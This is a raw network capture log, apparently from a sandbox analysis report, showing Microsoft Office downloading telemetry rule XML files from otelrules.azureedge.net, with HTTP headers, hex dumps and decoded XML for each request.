                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:33 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 472
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                      ETag: "0x8DC582B91EAD002"
                                                                                                                                                      x-ms-request-id: 26f79bf1-901e-0083-7ec4-45bb55000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125933Z-1746fd949bdhk6hphC1EWRaw3c000000013g000000000smz
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:34 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      98192.168.2.44986413.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:31 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:31 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 427
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                      ETag: "0x8DC582BB464F255"
                                                                                                                                                      x-ms-request-id: 1e2c2913-401e-0078-28cc-454d34000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125931Z-1746fd949bdw2rg8hC1EWR11u400000001cg00000000bpc1
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:32 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      99192.168.2.44986513.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:31 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:31 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 474
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                      ETag: "0x8DC582BA4037B0D"
                                                                                                                                                      x-ms-request-id: 85a1d3f6-901e-005b-3ecd-452005000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125931Z-1746fd949bdlqd7fhC1EWR6vt000000001eg00000000528f
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:32 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      100192.168.2.44986613.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:31 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:32 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 419
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                      ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                      x-ms-request-id: 859f66ca-901e-005b-0ccc-452005000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125932Z-1746fd949bdnq7x2hC1EWRpxr0000000015g0000000018bh
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      101192.168.2.44986713.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:32 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:32 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 472
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                      ETag: "0x8DC582B984BF177"
                                                                                                                                                      x-ms-request-id: 72953a3b-301e-0000-41cd-45eecc000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125932Z-1746fd949bdlqd7fhC1EWR6vt000000001a000000000aexq
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:33 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      102192.168.2.44986813.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:33 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:34 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 405
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                      ETag: "0x8DC582B942B6AFF"
                                                                                                                                                      x-ms-request-id: 92011275-e01e-0033-54c3-454695000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125934Z-1746fd949bd7wvgbhC1EWR0rgs000000019g000000006z9y
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:34 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      103192.168.2.44986913.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:33 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:34 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 468
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                      ETag: "0x8DC582BBA642BF4"
                                                                                                                                                      x-ms-request-id: 626f2b07-401e-0015-15d1-450e8d000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125934Z-1746fd949bdjrnwqhC1EWRpg2800000001ag000000005gsv
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:34 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      104192.168.2.44987013.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:34 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:34 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 174
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                      ETag: "0x8DC582B91D80E15"
                                                                                                                                                      x-ms-request-id: e8edc24c-801e-0083-0ecc-45f0ae000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125934Z-1746fd949bdnq7x2hC1EWRpxr000000000yg00000000c4at
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:34 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      105192.168.2.44987113.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:34 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:35 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:35 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1952
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                      ETag: "0x8DC582B956B0F3D"
                                                                                                                                                      x-ms-request-id: 3e1c70e6-d01e-0028-76c3-457896000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125935Z-1746fd949bd4w8sthC1EWR70040000000120000000002uwt
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:35 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      106192.168.2.44987213.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:35 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:36 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 958
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                      ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                      x-ms-request-id: 4927bbd2-c01e-000b-53cc-45e255000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125936Z-1746fd949bdzd2qvhC1EWRcygw000000012g0000000017yg
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:36 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      107192.168.2.44987313.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:36 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:36 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 501
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                      ETag: "0x8DC582BACFDAACD"
                                                                                                                                                      x-ms-request-id: d1823508-801e-008c-16d3-457130000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125936Z-1746fd949bdlqd7fhC1EWR6vt000000001bg000000008snc
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
